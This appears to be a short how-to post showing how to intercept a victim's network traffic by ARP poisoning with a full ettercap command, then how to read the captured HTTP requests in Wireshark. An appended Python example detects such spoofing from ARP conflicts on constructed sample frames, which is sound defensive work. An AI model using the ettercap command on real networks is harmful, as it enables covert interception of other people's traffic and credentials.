This is the easier and cheaper way:
You also need a Linux distro with Ettercap and Wireshark.
From the command line, type:
ettercap -T -Q -M arp:remote -i iface -w log.pcap /victimip/ /gatewayip/
-T text-only interface, only printf
-Q super quiet mode
-M arp:remote perform a MITM attack using ARP poisoning. “remote” is optional; you have to specify it if you want to sniff remote IP addresses by poisoning a gateway. Indeed, if you specify a victim and the gateway in the TARGETS, ettercap will sniff only the connections between them.
-i iface force the use of the “iface” network interface
-w log.pcap write the sniffed data to the “log.pcap” file
Open Wireshark and import the .pcap file, then go to:
Statistics -> HTTP -> Load Distribution
In the box type:
Now look at the “HTTP Requests by HTTP Hosts”.
This will show you all the sniffed inbound and outbound HTTP traffic.
But take a look at Xplico…
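Seen from the defender's side, the ARP poisoning that -M arp:remote performs leaves a recognisable trace: the gateway IP and the victim IP each end up claimed by two different MAC addresses, and one MAC shows up in both conflicts. The following is an added example, not part of the original post; the function names, addresses and sample frames are all constructed for illustration.

```python
import socket
import struct
from collections import defaultdict

ARP_HDR = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)  # Ethernet/IPv4, opcode 2 = reply

def arp_reply(src_mac, src_ip, dst_mac, dst_ip):
    """Build a raw Ethernet+ARP reply frame (only used for the constructed samples)."""
    s, d = bytes.fromhex(src_mac), bytes.fromhex(dst_mac)
    return (d + s + b"\x08\x06" + ARP_HDR
            + s + socket.inet_aton(src_ip) + d + socket.inet_aton(dst_ip))

def parse_arp(frame):
    """Return (sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, _op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return frame[22:28].hex(":"), socket.inet_ntoa(frame[28:32])

def find_conflicts(frames):
    """Map each IP claimed by more than one MAC to the sorted list of those MACs."""
    claims = defaultdict(set)
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed:
            mac, ip = parsed
            claims[ip].add(mac)
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}

def suspect_macs(conflicts):
    """MACs present in the conflict set of two or more IPs: the likely host in the middle."""
    hits = defaultdict(int)
    for macs in conflicts.values():
        for mac in macs:
            hits[mac] += 1
    return sorted(mac for mac, n in hits.items() if n >= 2)

# Constructed sample traffic: gateway .1, victim .50, and a third host answering for both.
GW, VICTIM, THIRD = "001122334455", "66778899aabb", "deadbeef0001"
SAMPLE = [
    arp_reply(GW, "192.168.1.1", VICTIM, "192.168.1.50"),     # genuine gateway
    arp_reply(VICTIM, "192.168.1.50", GW, "192.168.1.1"),     # genuine victim
    b"\x00" * 12 + b"\x08\x00" + b"\x00" * 40,                # non-ARP frame, ignored
    arp_reply(THIRD, "192.168.1.1", VICTIM, "192.168.1.50"),  # forged: gateway IP
    arp_reply(THIRD, "192.168.1.50", GW, "192.168.1.1"),      # forged: victim IP
]

if __name__ == "__main__":
    conflicts = find_conflicts(SAMPLE)
    print(conflicts, suspect_macs(conflicts))
```

A legitimate address change (a replaced NIC, a failover pair) also produces an IP with two MACs, so treat a conflict as a lead to check against the known gateway MAC rather than as proof.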